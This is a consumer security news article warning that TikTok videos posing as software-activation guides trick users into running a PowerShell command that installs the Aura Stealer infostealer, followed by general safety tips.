Beware of TikTok Tricks: Hackers Hijack Videos to Scam You and Steal Your Data

Facebook, YouTube, and now TikTok: these platforms are a treasure trove of potential targets for cybercriminals. Cybersecurity researchers have uncovered several TikTok videos that camouflage attacks part of the nefarious ClickFix malware campaign. Here’s how to safeguard yourself.

Social media platforms are a goldmine for hackers in search of new targets. Earlier this year, cybersecurity experts detected a malvertising campaign that initially exploited Meta’s advertising platforms with bogus offers for free access to TradingView Premium, later moving to YouTube and Google Ads.

However, dear TikTok users, your favorite platform is not without risks either. Cybersecurity experts, including Trend Micro and Xavier Mertens, have identified videos instructing users on how to “activate” popular software like Adobe Premiere, Microsoft 365, and Windows, as well as non-existent bundles like Spotify or Netflix. These are actually instructions to execute malicious commands.

ClickFix Malicious Campaigns Now Targeting TikTok

The campaign employs the ClickFix method, a scam technique known since the early 2000s, which now has a variant called FileFix. This recent proof of concept is used by hackers to drain your sensitive data through the simple act of copying/pasting a fake Facebook link.

Initially, this scam technique involved convincing the user that their PC had an issue and offering a “quick and easy solution.” Today, it manifests in various forms, according to TechRadar colleagues: exclusive offers, supposedly locked documents, or, as in this case, software activators.

It tricks users into copying/pasting a command into Windows Run. However, this command is a malicious PowerShell script that downloads and executes the Aura Stealer spyware, designed to steal stored browser passwords, user credentials, cryptocurrency wallet data, and authentication cookies. According to Mertens, the ClickFix code downloads another piece of malware, but its purpose remains unclear at the moment.

To protect yourself from ClickFix attacks, here are some recommendations:

• Avoid clicking on links from emails or websites.
• Always use official websites and legitimate software.
• Regularly update your devices and software.
• Implement an antivirus and an ad blocker.
• Be cautious about the permissions sites or apps may ask for.

Two key takeaways from the various malicious campaigns identified by experts: if you’re asked to act “urgently,” it’s often a sign that there is no real urgency—only a trap; and if something seems too good to be true, it probably is.